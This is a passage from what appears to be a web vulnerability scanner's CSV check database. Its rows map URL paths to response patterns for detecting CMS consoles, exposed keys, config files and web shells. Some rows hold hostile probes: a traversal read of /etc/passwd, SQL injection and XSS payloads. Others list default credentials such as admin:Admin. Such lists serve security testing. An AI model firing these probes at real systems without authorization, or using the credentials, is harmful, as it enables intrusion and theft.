console\",\"\",\"\"\n\"006730\",\"0\",\"e\",\"/system/console/bundles\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"OSGi Apache Felix console\",\"\",\"\"\n\"006731\",\"0\",\"e\",\"/system/console\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"OSGi Apache Felix console\",\"\",\"\"\n\"006732\",\"0\",\"0\",\"/repository/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CRX WebDAV upload\",\"\",\"\"\n\"006734\",\"0\",\"0\",\"/cqresource/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CRX WebDAV upload\",\"\",\"\"\n\"006735\",\"0\",\"3\",\"/etc/cloudservices\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Adobe Experience Manager Cloud Service Information\",\"\",\"\"\n\"006736\",\"0\",\"3\",\"/etc/reports\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Adobe Experience Manager Reports\",\"\",\"\"\n\"006737\",\"0\",\"7\",\"@WORDPRESSwp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_addgallery_page/static/jquery.filetree/connectors/jqueryFileTree.php\",\"POST\",\"root\",\"windows\",\"200\",\"\",\"\",\"NextGEN Gallery LFI, see https://security.dxw.com/advisories/directory-traversal-in-nextgen-gallery-2-0-0/\",\"dir=/\",\"\"\n\"006738\",\"0\",\"8b\",\"@CGIDIRSc99.php\",\"GET\",\"200\",\"\",\"r57 c99 shell\",\"\",\"\",\"c99.php remote web shell\",\"\",\"\"\n\"006739\",\"0\",\"8b\",\"/c99.php\",\"GET\",\"200\",\"\",\"r57 c99 shell\",\"\",\"\",\"c99.php remote web shell\",\"\",\"\"\n\"006740\",\"3092\",\"3\",\"/dumpinfo\",\"GET\",\"200\",\"Service\\sLocator\\sURL\\sMappings\",\"\",\"\",\"\",\"National Instruments Service Locator\",\"\",\"\"\n\"006741\",\"0\",\"3\",\"/somenonexistingfile.epl\",\"GET\",\"404: somenonexistingfile\\.epl\\(1\\): Not found '/.*/somenonexistingfile\\.epl'\",\"\",\"\",\"\",\"\",\"Embperl 404 message discloses full file path\",\"\",\"\"\n\"006742\",\"0\",\"1\",\"/umbraco/ping.aspx\",\"GET\",\"I'm alive!\",\"\",\"\",\"\",\"\",\"Umbraco ping page found\",\"\",\"\"\n\"006743\",\"0\",\"3\",\"/Trace.axd\",\"GET\",\"Request\\sDetails\",\"Application\\sTrace\",\"\",\"\",\"\",\"Trace.axd can reveal application or system details\",\"\",\"\"\n\"006744\",\"0\",\"a\",\"/SDE/timeout.aspx\",\"GET\",\"bmclabelbold\",\"\",\"\",\"\",\"\",\"BMC Service Desk Express found\",\"\",\"\"\n\"006745\",\"0\",\"e\",\"/manage/CxSense/\",\"GET\",\"200\",\"\",\"SmartCipher\",\"\",\"\",\"Covertix SmartCipher Console Login detected. Default credentials are: admin:Admin\",\"\",\"\"\n\"006746\",\"0\",\"3\",\"/manage/Logs/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Covertix SmartCipher Console Login and Web Service Log directory detected\",\"\",\"\"\n\"006747\",\"0\",\"d\",\"/manage/CxSenseWebService/CxSense.asmx\",\"GET\",\"200\",\"\",\"CxSense\\sWeb\\sService\",\"\",\"\",\"Covertix SmartCipher Web Service detected\",\"\",\"\"\n\"006748\",\"0\",\"d\",\"/ws/CxInternetDMZ.asmx\",\"GET\",\"200\",\"\",\"CxServerDMZ\",\"\",\"\",\"Covertix SmartCipher DMZ Server Web Service detected\",\"\",\"\"\n\"006749\",\"51887\",\"7\",\"/horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Horde local file retrieval (LFI) found. CVE-2009-0932.\",\"\",\"\"\n\"006750\",\"0\",\"b\",\"@OWNCLOUDstatus.php\",\"GET\",\"\\{\\\"installed\\\":\\\"true\\\",\\\"(version|maintenance)\\\":\\\"\",\"\",\"200\",\"\",\"\",\"ownCloud/Nextcloud installation identified by status.php, see the program for the running version\",\"\",\"\"\n\"006751\",\"0\",\"0\",\"@OWNCLOUDremote.php/webdav\",\"GET\",\"Generated\\sby\\sSabreDAV\",\"Sabre_DAV_Exception_NotAuthenticated\",\"\",\"\",\"\",\"ownCloud WebDAV file upload detected (pass protected), remote.php/caldav and remote.php/carddav are also valid\",\"\",\"\"\n\"006752\",\"0\",\"1235\",\"@OWNCLOUD@OCFILES\",\"GET\",\"(\\\"app\\\":\\\"|\\\"reqId\\\":\\\"|This is used for testing whether htaccess|SQLite format)\",\"\",\"200\",\"\",\"\",\"Unprotected ownCloud data directory identified\",\"\",\"\"\n\"006754\",\"0\",\"b\",\"@SECLOREWelcome.do\",\"GET\",\"200\",\"\",\"Powered\\sBy\\sFileSecure\",\"\",\"\",\"Seclore FileSecure installation detected. Default credentials are: root:changeonfirstlogin and sa:changeonfirstlogin.\",\"\",\"\"\n\"006755\",\"0\",\"e\",\"/eyekit/eyekit.php\",\"GET\",\"200\",\"\",\"eyekit\\sRelease\",\"\",\"\",\"eyeKit CMS admin login detected\",\"\",\"\"\n\"006756\",\"0\",\"12\",\"/rsa\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Encryption key exposed\",\"\",\"\"\n\"006757\",\"0\",\"12\",\"/rsa.old\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Encryption key exposed\",\"\",\"\"\n\"006758\",\"0\",\"12\",\"/dsa\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Encryption key exposed\",\"\",\"\"\n\"006759\",\"0\",\"12\",\"/dsa.old\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Encryption key exposed\",\"\",\"\"\n\"006760\",\"0\",\"12\",\"/id_rsa\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Encryption key exposed\",\"\",\"\"\n\"006761\",\"0\",\"12\",\"/id_rsa.old\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Encryption key exposed\",\"\",\"\"\n\"006762\",\"0\",\"12\",\"/id_dsa\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Encryption key exposed\",\"\",\"\"\n\"006763\",\"0\",\"12\",\"/id_dsa.old\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Encryption key exposed\",\"\",\"\"\n\"006764\",\"0\",\"12\",\"/identity\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Encryption key exposed\",\"\",\"\"\n\"006765\",\"0\",\"12\",\"/key\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Encryption key exposed\",\"\",\"\"\n\"006766\",\"0\",\"12\",\"/key.priv\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Encryption key exposed\",\"\",\"\"\n\"006767\",\"0\",\"2be\",\"/App_Config/sitecore/debug/Trace.xslt\",\"GET\",\"Elapsed\\ssince\",\"\",\"\",\"\",\"\",\"Sitecore CMS admin/restricted pages available\",\"\",\"\"\n\"006768\",\"0\",\"2be\",\"/App_Config/sitecore/debug/Profile.xslt\",\"GET\",\"Most\\sItems\\sRead\",\"\",\"\",\"\",\"\",\"Sitecore CMS admin/restricted pages available\",\"\",\"\"\n\"006769\",\"0\",\"2be\",\"/App_Config/sitecore/shell/sitecore.version.xml\",\"GET\",\"<major>\",\"\",\"\",\"\",\"\",\"Sitecore CMS admin/restricted pages available\",\"\",\"\"\n\"006770\",\"0\",\"2be\",\"/App_Config/sitecore/admin/cache.aspx\",\"GET\",\"<title>Cache\\sAdmin\",\"\",\"\",\"\",\"\",\"Sitecore CMS admin/restricted pages available\",\"\",\"\"\n\"006771\",\"0\",\"2be\",\"/App_Config/sitecore/admin/stats.aspx\",\"GET\",\"<title>Statistics\",\"\",\"\",\"\",\"\",\"Sitecore CMS admin/restricted pages available\",\"\",\"\"\n\"006772\",\"0\",\"2be\",\"/App_Config/ConnectionStrings.config\",\"GET\",\"Sitecore\\sconnection\",\"\",\"\",\"\",\"\",\"Sitecore CMS admin/restricted pages available\",\"\",\"\"\n\"006773\",\"0\",\"2be\",\"/web.config.Net3_5.MVC\",\"GET\",\"name=\\\"sitecore\",\"\",\"\",\"\",\"\",\"Sitecore CMS admin/restricted pages available (this is likely a default web.config)\",\"\",\"\"\n\"006774\",\"0\",\"2be\",\"/web.config.Net4.MVC\",\"GET\",\"name=\\\"sitecore\",\"\",\"\",\"\",\"\",\"Sitecore CMS admin/restricted pages available (this is likely a default web.config)\",\"\",\"\"\n\"006775\",\"0\",\"2be\",\"/sitecore_data/webdav.lic\",\"GET\",\"IT\\sHit\\sWebDAV\",\"\",\"\",\"\",\"\",\"Sitecore CMS license\",\"\",\"\"\n\"006776\",\"0\",\"2be\",\"/sitecore%20modules/Shell/IndexViewer/MainForm.aspx\",\"GET\",\"Welcome\\sto\\sthe\\sIndexViewer\",\"\",\"\",\"\",\"\",\"Sitecore CMS admin/restricted pages available\",\"\",\"\"\n\"006777\",\"0\",\"2be\",\"/sitecore/data/logs/nvelocity.log\",\"GET\",\"SimpleLog4NetLogSystem\",\"\",\"\",\"\",\"\",\"Sitecore CMS admin/restricted pages available\",\"\",\"\"\n\"006778\",\"0\",\"2be\",\"/sitecore/debug/Profile.xslt\",\"GET\",\"Data\\sCache\",\"cachemiss\",\"\",\"\",\"\",\"Sitecore CMS admin/restricted pages available\",\"\",\"\"\n\"006779\",\"0\",\"2be\",\"/sitecore/login/default.aspx\",\"GET\",\"LoginPanelOuter\",\"\",\"\",\"\",\"\",\"Sitecore CMS admin login\",\"\",\"\"\n\"006780\",\"0\",\"2be\",\"/sitecore/shell/WebService/Service.asmx\",\"GET\",\"operations\\sare\\ssupported\",\"\",\"\",\"\",\"\",\"Sitecore CMS webservice found\",\"\",\"\"\n\"006781\",\"0\",\"2be\",\"/?sc_mode=edit\",\"GET\",\"302\",\"\",\"sitecore\",\"\",\"\",\"Sitecore CMS is installed. This url redirects to the login page.\",\"\",\"\"\n\"006782\",\"0\",\"2be\",\"/sitecore/admin/stats.aspx\",\"GET\",\"Renderings\",\"\",\"\",\"\",\"\",\"Sitecore CMS admin/restricted pages available\",\"\",\"\"\n\"006783\",\"0\",\"2be\",\"/wcadmin/login.aspx\",\"GET\",\"QS\\/1\",\"\",\"\",\"\",\"\",\"QS/1 Webconnect administration panel\",\"\",\"\"\n\"006784\",\"74115\",\"4\",\"/sitecore/login?xmlcontrol=Application&url=http://www.example.com&ch=WindowChrome&ic=Applications%2f32x32%2fabout.png&he=About+Sitecore&ma=0&mi=0&re=\",\"GET\",\"src=\\\"http:\\/\\/www\\.example\\.com\",\"\",\"\",\"\",\"\",\"Sitecore CMS contains an arbitrary redirect vulnerability.\",\"\",\"\"\n\"006785\",\"102660\",\"4\",\"/?xmlcontrol=body%20onload=alert(123)\",\"GET\",\"<body\\sONLOAD=ALERT\\s123\",\"\",\"\",\"\",\"\",\"Sitecore CMS vulnerable to Cross-Site Scripting\",\"\",\"\"\n\"006786\",\"0\",\"be\",\"/crystal/enterprise10/admin/en/admin.cwr\",\"GET\",\"Crystal\\sManagement\\sConsole\",\"\",\"\",\"\",\"\",\"Crystal Enterprise Management Console found\",\"\",\"\"\n\"006787\",\"0\",\"1\",\"/encrypt.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"006788\",\"0\",\"1\",\"/decrypt.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"006789\",\"0\",\"1\",\"/encrypt.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"006790\",\"0\",\"1\",\"/decrypt.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"006791\",\"0\",\"1\",\"/encrypt.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"006792\",\"0\",\"1\",\"/decrypt.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"006793\",\"0\",\"1\",\"/encrypt.jsp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"006794\",\"0\",\"1\",\"/decrypt.jsp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"006795\",\"0\",\"1\",\"/encrypt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"006796\",\"0\",\"1\",\"/decrypt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"006797\",\"3093\",\"0\",\"@FCKEDITOReditor/filemanager/browser/default/frmcreatefolder.html\",\"GET\",\"Create New Folder\",\"\",\"\",\"\",\"\",\"FCKeditor could allow files to be updated or edited by remote attackers.\",\"\",\"\"\n\"006798\",\"3093\",\"0\",\"@FCKEDITOReditor/filemanager/connectors/test.html\",\"GET\",\"FCKeditor\\s-\\sConnectors Tests\",\"\",\"\",\"\",\"\",\"FCKeditor could allow files to be updated or edited by remote attackers.\",\"\",\"\"\n\"006799\",\"3093\",\"0\",\"@FCKEDITOReditor/filemanager/connectors/uploadtest.html\",\"GET\",\"FCKeditor\\s-\\sUploaders Tests\",\"\",\"\",\"\",\"\",\"FCKeditor could allow files to be updated or edited by remote attackers.\",\"\",\"\"\n\"006800\",\"3093\",\"0\",\"@FCKEDITOReditor/filemanager/connectors/asp/connector.asp?Command=GetFolders&Type=File&CurrentFolder=%2F\",\"GET\",\"</Connector>\",\"This\\sconnector\\sis\\sdisabled\",\"\",\"\",\"\",\"FCKeditor could allow files to be updated or edited by remote attackers.\",\"\",\"\"\n\"006801\",\"3093\",\"0\",\"@FCKEDITOReditor/filemanager/connectors/aspx/connector.aspx?Command=GetFolders&Type=File&CurrentFolder=%2F\",\"GET\",\"</Connector>\",\"This\\sconnector\\sis\\sdisabled\",\"\",\"\",\"\",\"FCKeditor could allow files to be updated or edited by remote attackers.\",\"\",\"\"\n\"006802\",\"3093\",\"0\",\"@FCKEDITOReditor/filemanager/connectors/cfm/connector.cfm?Command=GetFolders&Type=File&CurrentFolder=%2F\",\"GET\",\"</Connector>\",\"This\\sconnector\\sis\\sdisabled\",\"\",\"\",\"\",\"FCKeditor could allow files to be updated or edited by remote attackers.\",\"\",\"\"\n\"006803\",\"3093\",\"0\",\"@FCKEDITOReditor/filemanager/connectors/lasso/connector.lasso?Command=GetFolders&Type=File&CurrentFolder=%2F\",\"GET\",\"</Connector>\",\"This\\sconnector\\sis\\sdisabled\",\"\",\"\",\"\",\"FCKeditor could allow files to be updated or edited by remote attackers.\",\"\",\"\"\n\"006804\",\"3093\",\"0\",\"@FCKEDITOReditor/filemanager/connectors/perl/connector.cgi?Command=GetFolders&Type=File&CurrentFolder=%2F\",\"GET\",\"</Connector>\",\"This\\sconnector\\sis\\sdisabled\",\"\",\"\",\"\",\"FCKeditor could allow files to be updated or edited by remote attackers.\",\"\",\"\"\n\"006805\",\"3093\",\"0\",\"@FCKEDITOReditor/filemanager/connectors/php/connector.php?Command=GetFolders&Type=File&CurrentFolder=%2F\",\"GET\",\"</Connector>\",\"This\\sconnector\\sis\\sdisabled\",\"\",\"\",\"\",\"FCKeditor could allow files to be updated or edited by remote attackers.\",\"\",\"\"\n\"006806\",\"3093\",\"0\",\"@FCKEDITOReditor/filemanager/connectors/py/connector.py?Command=GetFolders&Type=File&CurrentFolder=%2F\",\"GET\",\"</Connector>\",\"This\\sconnector\\sis\\sdisabled\",\"\",\"\",\"\",\"FCKeditor could allow files to be updated or edited by remote attackers.\",\"\",\"\"\n\"006807\",\"0\",\"123\",\"/.git/config\",\"GET\",\"\\[core\\]\",\"\\[branch\",\"\",\"\",\"\",\"Git config file found. Infos about repo details may be present.\",\"\",\"\"\n\"006808\",\"0\",\"e\",\"/solr/admin/\",\"GET\",\"Solr\\sadmin\\spage\",\"\",\"\",\"\",\"\",\"Apache Solr administration console found\",\"\",\"\"\n\"006809\",\"0\",\"2abe\",\"/html/vergessen.html\",\"GET\",\"uiRestoreFactoryDefaults\",\"\",\"\",\"\",\"\",\"The Fritz!Box gateway allows any user to restore factory default settings.\",\"\",\"\"\n\"006810\",\"3233\",\"2\",\"@TYPO3typo3/install/index.php\",\"GET\",\"200\",\"\",\"Install\\sTool\",\"\",\"\",\"TYPO3 Install Tool identified. This might be interesting...\",\"\",\"\"\n\"006811\",\"0\",\"2be\",\"/dnnLogin.aspx\",\"GET\",\"Enter\\syour\\sUser\\sName\\sbelow\",\"\",\"\",\"\",\"\",\"DotNetNuke Login page found.\",\"\",\"\"\n\"006812\",\"0\",\"2be\",\"/dnn/Login.aspx\",\"GET\",\"Login_DNN\",\"\",\"\",\"\",\"\",\"DotNetNuke Login page found.\",\"\",\"\"\n\"006813\",\"0\",\"2be\",\"/tabid/400999900/ctl/Login/portalid/699996/Default.aspx\",\"GET\",\"Login_DNN\",\"\",\"\",\"\",\"\",\"DotNetNuke Login page found with random tabid and portalid parameters.\",\"\",\"\"\n\"006814\",\"0\",\"2b\",\"/Portals/_default/Cache/ReadMe.txt\",\"GET\",\"cache\\ssynchronization\",\"\",\"\",\"\",\"\",\"DotNetNuke default page found. Look for an admin interface on /tabid/19/, /tabid/36/ or enumerate numbers to identify logins/content.\",\"\",\"\"\n\"006815\",\"0\",\"9\",\"/DesktopModules/DNNArticle/DNNArticleRSS.aspx?portalid=18&moduleid=0&categoryid=1+or+1=@@junk\",\"GET\",\"Conversoin\\sfailed\",\"\",\"\",\"\",\"\",\"DotNetNuke SQL injection found, see http://www.exploit-db.com/exploits/27602/.\",\"\",\"\"\n\"006816\",\"0\",\"52\",\"/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx\",\"GET\",\"Link\\sGallery\",\"\",\"\",\"\",\"\",\"DotNetNuke Link Gallery may allow file upload/retrieval. See http://www.exploit-db.com/exploits/12700/\",\"\",\"\"\n\"006817\",\"3093\",\"23\",\"@TYPO3typo3_src/ChangeLog\",\"GET\",\"Release\\sof\\sTYPO3\",\"\",\"\",\"\",\"\",\"TYPO3 ChangeLog file found.\",\"\",\"\"\n\"006818\",\"0\",\"23\",\"/_about\",\"GET\",\"Tildeslash\",\"\",\"\",\"\",\"\",\"Unrestricted Monit web interface found. This reveals sensitive information, and may allow stopping of critical services.\",\"\",\"\"\n\"006823\",\"0\",\"be\",\"/portlet/login/login.jsp\",\"GET\",\"sign-in-form\",\"\",\"\",\"\",\"\",\"LifeRay Portal administrative login found.\",\"\",\"\"\n\"006824\",\"0\",\"9a\",\"/CHANGELOG.txt\",\"GET\",\"Drupal 7\\.([012][0-9]|3[0-1])\",\"200\",\"\",\"\",\"\",\"Version number implies that there is a SQL Injection in Drupal 7, can be used for authentication bypass (Drupageddon: see https://www.sektioneins.de/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html).\",\"\",\"\"\n\"006825\",\"0\",\"1\",\"/debug.jsp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Possible debug directory/program found.\",\"\",\"\"\n\"006826\",\"0\",\"1\",\"/debug.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Possible debug directory/program found.\",\"\",\"\"\n\"006827\",\"0\",\"1\",\"/debug.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Possible debug directory/program found.\",\"\",\"\"\n\"006828\",\"0\",\"1\",\"/debug/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Possible debug directory/program found.\",\"\",\"\"\n\"006829\",\"0\",\"1\",\"/stats\",\"GET\",\"Statistics\\sReport\",\"\",\"\",\"\",\"\",\"HAProxy stats page found.\",\"\",\"\"\n\"006830\",\"0\",\"1\",\"/haproxy_stats\",\"GET\",\"Statistics\\sReport\",\"\",\"\",\"\",\"\",\"HAProxy stats page found.\",\"\",\"\"\n\"006831\",\"0\",\"2b\",\"/cgi-bin/info.cgi\",\"GET\",\"200\",\"\",\"Model=WDMyCloud\",\"\",\"\",\"WD My Cloud (Mirror) NAS found. Default credentials for the login on / is 'admin' with an empty password.\",\"\",\"\"\n\"006832\",\"637\",\"23\",\"/~ftp/\",\"GET\",\"200\",\"\",\"\",\"rtsptext\",\"\",\"Allowed to browse ftp user's home directory.\",\"\",\"\"\n\"006833\",\"3092\",\"3\",\"/web.config.local\",\"GET\",\"<configuration>\",\"\",\"200\",\"\",\"\",\"ASP config (development) file is accessible.\",\"\",\"\"\n\"006834\",\"3092\",\"123b\",\"/pom.xml\",\"GET\",\"<project>\",\"\",\"\",\"\",\"\",\"Maven Project Object Model file may contain interesting information.\",\"\",\"\"\n\"006835\",\"3092\",\"123b\",\"/project.xml\",\"GET\",\"<project>\",\"\",\"\",\"\",\"\",\"Maven Project Object Model file may contain interesting information.\",\"\",\"\"\n\"006836\",\"3092\",\"123b\",\"/maven.xml\",\"GET\",\"<project\",\"\",\"\",\"\",\"\",\"Maven Project Object Model file may contain interesting information.\",\"\",\"\"\n\"006837\",\"0\",\"1\",\"/ultrasearch/\",\"GET\",\"Oracle Ultra Search\",\"\",\"\",\"\",\"\",\"Oracle Ultrasearch page found.\",\"\",\"\"\n\"006838\",\"0\",\"be\",\"/useradmin/index.jsp\",\"GET\",\"/useradmin/userAdminServlet\",\"\",\"\",\"\",\"\",\"SAP Admin interface.\",\"\",\"\"\n\"006839\",\"0\",\"be\",\"/uddiclient/jsps/index.jsp\",\"GET\",\"apUrMapi_\",\"\",\"\",\"\",\"\",\"SAP Admin interface.\",\"\",\"\"\n\"006840\",\"0\",\"be\",\"/webdynpro/dispatcher/sap.com/tc~lm~webadmin~mainframe~wd/WebAdminApp\",\"GET\",\"SAP\\sNetWeaver\",\"\",\"\",\"\",\"\",\"SAP Admin interface.\",\"\",\"\"\n\"006841\",\"0\",\"be\",\"/admin/\",\"GET\",\"<title>Magnolia Login Form<\\/title>\",\"\",\"<h1>Magnolia Login<\\/h1>\",\"\",\"\",\"Magnolia administrative login found.\",\"\",\"\"\n\"006842\",\"0\",\"3be\",\"@TYPO3superadmin.php\",\"GET\",\"<title>TYPO3\\sSuper\\sAdmin</\\title>\",\"<title>Typo3\\sSuper\\sAdmin<\\/title>\",\"200\",\"\",\"\",\"TYPO3 Super Admin component identified. This could contain passwords and infos about the current installed TYPO3 instances.\",\"\",\"\"\n\"006843\",\"0\",\"3be\",\"@TYPO3misc/superadmin.php\",\"GET\",\"<title>TYPO3\\sSuper\\sAdmin<\\/title>\",\"<title>Typo3\\sSuper\\sAdmin<\\/title>\",\"200\",\"\",\"\",\"TYPO3 Super Admin component identified. This could contain passwords and infos about the current installed TYPO3 instances.\",\"\",\"\"\n\"006844\",\"0\",\"d\",\"/_vti_bin/lists.asmx\",\"GET\",\"Lists\\sWeb\\sService\",\"\",\"\",\"\",\"\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006845\",\"0\",\"d\",\"/_vti_bin/Admin.asmx\",\"GET\",\"Service\\sDescription\",\"\",\"\",\"\",\"\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006846\",\"0\",\"d\",\"/_vti_bin/alerts.asmx\",\"GET\",\"Service\\sDescription\",\"\",\"\",\"\",\"\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006847\",\"0\",\"d\",\"/_vti_bin/AreaService.asmx\",\"GET\",\"Service\\sDescription\",\"\",\"\",\"\",\"\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006848\",\"0\",\"d\",\"/_vti_bin/Authentication.asmx\",\"GET\",\"Service\\sDescription\",\"\",\"\",\"\",\"\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006849\",\"0\",\"d\",\"/_vti_bin/BusinessDataCatalog.asmx\",\"GET\",\"Service\\sDescription\",\"\",\"\",\"\",\"\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006850\",\"0\",\"d\",\"/_vti_bin/copy.asmx\",\"GET\",\"Service\\sDescription\",\"\",\"\",\"\",\"\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006851\",\"0\",\"d\",\"/_vti_bin/dspsts.asmx\",\"GET\",\"Service\\sDescription\",\"\",\"\",\"\",\"\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006852\",\"0\",\"d\",\"/_vti_bin/dws.asmx\",\"GET\",\"Service\\sDescription\",\"\",\"\",\"\",\"\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006853\",\"0\",\"d\",\"/_vti_bin/ExcelService.asmx\",\"GET\",\"Service\\sDescription\",\"\",\"\",\"\",\"\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006854\",\"0\",\"d\",\"/_vti_bin/forms.asmx\",\"GET\",\"Service\\sDescription\",\"\",\"\",\"\",\"\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006855\",\"0\",\"d\",\"/_vti_bin/imaging.asmx\",\"GET\",\"Service\\sDescription\",\"\",\"\",\"\",\"\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006856\",\"0\",\"d\",\"/_vti_bin/meetings.asmx\",\"GET\",\"Service\\sDescription\",\"\",\"\",\"\",\"\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006857\",\"0\",\"d\",\"/_vti_bin/people.asmx\",\"GET\",\"Service\\sDescription\",\"\",\"\",\"\",\"\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006858\",\"0\",\"d\",\"/_vti_bin/People.asmx\",\"GET\",\"Service\\sDescription\",\"\",\"\",\"\",\"\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006859\",\"0\",\"d\",\"/_vti_bin/permissions.asmx\",\"GET\",\"Service\\sDescription\",\"\",\"\",\"\",\"\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006860\",\"0\",\"d\",\"/_vti_bin/Permissions.asmx\",\"GET\",\"Service\\sDescription\",\"\",\"\",\"\",\"\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006861\",\"0\",\"d\",\"/_vti_bin/search.asmx\",\"GET\",\"Service\\sDescription\",\"\",\"\",\"\",\"\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006862\",\"0\",\"d\",\"/_vti_bin/SharepointEmailWS.asmx\",\"GET\",\"Service\\sDescription\",\"\",\"\",\"\",\"\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006863\",\"0\",\"d\",\"/_vti_bin/SiteData.asmx\",\"GET\",\"Service\\sDescription\",\"\",\"\",\"\",\"\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006864\",\"0\",\"d\",\"/_vti_bin/sites.asmx\",\"GET\",\"Service\\sDescription\",\"\",\"\",\"\",\"\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006865\",\"0\",\"d\",\"/_vti_bin/spscrawl.asmx\",\"GET\",\"Service\\sDescription\",\"\",\"\",\"\",\"\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006866\",\"0\",\"d\",\"/_vti_bin/spsdisco.aspx\",\"GET\",\"Service\\sDescription\",\"\",\"\",\"\",\"\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006867\",\"0\",\"d\",\"/_vti_bin/spsearch.asmx\",\"GET\",\"Service\\sDescription\",\"\",\"\",\"\",\"\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006868\",\"0\",\"d\",\"/_vti_bin/UserGroup.asmx\",\"GET\",\"Service\\sDescription\",\"\",\"\",\"\",\"\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006869\",\"0\",\"d\",\"/_vti_bin/UserProfileService.asmx\",\"GET\",\"Service\\sDescription\",\"\",\"\",\"\",\"\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006870\",\"0\",\"d\",\"/_vti_bin/versions.asmx\",\"GET\",\"Service\\sDescription\",\"\",\"\",\"\",\"\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006871\",\"0\",\"d\",\"/_vti_bin/views.asmx\",\"GET\",\"Service\\sDescription\",\"\",\"\",\"\",\"\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006872\",\"0\",\"d\",\"/_vti_bin/Views.asmx\",\"GET\",\"Service\\sDescription\",\"\",\"\",\"\",\"\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006873\",\"0\",\"d\",\"/_vti_bin/webpartpages.asmx\",\"GET\",\"Service\\sDescription\",\"\",\"\",\"\",\"\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006874\",\"0\",\"d\",\"/_vti_bin/WebPartPages.asmx\",\"GET\",\"Service\\sDescription\",\"\",\"\",\"\",\"\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006875\",\"0\",\"d\",\"/_vti_bin/webs.asmx\",\"GET\",\"Service\\sDescription\",\"\",\"\",\"\",\"\",\"Microsoft Sharepoint WebService available.\",\"\",\"\"\n\"006876\",\"0\",\"b1\",\"/_vti_bin/owssvr.dll\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006877\",\"0\",\"b1\",\"/_vti_bin/_vti_adm/admin.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006878\",\"0\",\"b1\",\"/_vti_bin/_vti_aut/author.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile 